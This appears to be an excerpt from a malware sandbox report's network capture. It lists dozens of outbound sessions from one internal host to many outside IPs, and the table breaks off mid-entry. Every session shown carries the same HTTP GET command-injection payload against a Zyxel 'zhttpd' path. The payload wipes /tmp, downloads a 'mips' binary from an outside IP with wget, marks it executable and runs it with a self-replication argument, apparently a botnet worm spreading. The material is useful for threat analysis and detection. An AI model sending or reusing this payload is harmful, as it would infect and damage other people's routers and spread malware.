                        Session IDSource IPSource PortDestination IPDestination Port
                        1370192.168.2.145100651.254.189.89443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.086415052 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1371192.168.2.1441888117.72.110.161443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.086456060 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1372192.168.2.1453350109.161.159.76443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.086509943 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1373192.168.2.1448652222.244.199.168443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.086545944 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1374192.168.2.1444746210.166.64.11443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.086608887 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1375192.168.2.1439448202.82.34.105443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.086647034 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1376192.168.2.1437696180.20.126.153443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.086690903 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1377192.168.2.1460868105.12.170.217443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.086754084 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1378192.168.2.1449322157.135.123.124443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.086788893 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1379192.168.2.143566027.189.11.6443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.086844921 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1380192.168.2.1434274120.103.245.35443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.086889029 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1381192.168.2.14544684.131.203.212443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.086934090 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1382192.168.2.143323687.243.110.189443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.086976051 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1383192.168.2.1455882173.46.118.124443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.087018013 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1384192.168.2.1449172180.44.238.47443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.087035894 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1385192.168.2.145381063.144.118.144443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.087090015 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1386192.168.2.1459794154.216.200.193443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.087127924 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1387192.168.2.145547293.185.59.7443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.087188005 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1388192.168.2.1445550113.151.128.229443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.087215900 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1389192.168.2.1437890155.111.23.39443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.088496923 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1390192.168.2.1451578212.164.108.153443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.088541985 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1391192.168.2.1450870145.163.58.24443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.088596106 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1392192.168.2.14491802.109.167.30443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.088644028 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1393192.168.2.145361297.25.129.133443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.088692904 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1394192.168.2.145037012.2.112.174443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.088737011 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1395192.168.2.1437798211.94.50.13443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.088774920 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1396192.168.2.1446030122.62.11.176443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.088809967 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1397192.168.2.1440096190.141.66.168443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.088852882 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1398192.168.2.1454480109.190.191.40443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.088917971 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1399192.168.2.144203049.229.166.194443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.088943005 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1400192.168.2.144839297.227.89.145443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.088989973 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1401192.168.2.145615620.41.65.40443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.089018106 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1402192.168.2.1436544174.67.214.49443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.089061022 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1403192.168.2.1440668138.53.4.139443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.089123011 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1404192.168.2.1432916115.155.97.176443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.089157104 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1405192.168.2.145769849.189.1.11443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.089199066 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1406192.168.2.145994062.128.184.173443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.089243889 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1407192.168.2.1446892102.250.49.171443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.089307070 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1408192.168.2.1447306178.185.100.34443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.089327097 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1409192.168.2.143395231.56.97.168443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.089387894 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1410192.168.2.1456466148.228.129.189443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.089400053 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1411192.168.2.1433904190.40.191.82443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.089451075 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1412192.168.2.1450306136.87.2.219443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.089484930 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1413192.168.2.1444456201.48.28.244443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.089524031 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1414192.168.2.1459266198.36.97.249443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.089560032 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1415192.168.2.1442052160.158.232.86443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.089612961 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1416192.168.2.1449002147.170.154.34443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.089641094 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1417192.168.2.1455728153.129.161.245443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.089689970 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1418192.168.2.1458166218.53.88.249443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.089730024 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1419192.168.2.1433468217.64.139.84443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.089766026 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1420192.168.2.1459946125.161.5.50443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.089809895 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1421192.168.2.14464304.160.138.143443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.089859962 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1422192.168.2.1452588105.113.7.138443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.089888096 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1423192.168.2.1453436106.202.78.122443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.089941978 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1424192.168.2.1456628144.147.38.119443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.089997053 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1425192.168.2.1453826219.4.2.159443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.090028048 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1426192.168.2.1455544168.141.153.197443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.090080023 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1427192.168.2.144241887.183.149.13443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.090111971 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1428192.168.2.146007876.233.139.167443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.090159893 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1429192.168.2.1448198204.173.42.31443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.090190887 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1430192.168.2.144020671.124.94.151443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.090249062 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1431192.168.2.145273094.38.124.153443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.090286016 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1432192.168.2.1444176208.218.232.198443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.090339899 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1433192.168.2.144444820.232.225.71443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.090373993 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1434192.168.2.1433376107.36.213.29443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.090420961 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1435192.168.2.145993097.200.102.196443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.090462923 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1436192.168.2.1442928177.14.120.110443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.090501070 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1437192.168.2.145962499.99.1.138443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.090544939 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1438192.168.2.1433352208.133.15.54443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:32.090567112 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1439192.168.2.143320237.31.203.163443
                        TimestampBytes transferredDirectionData
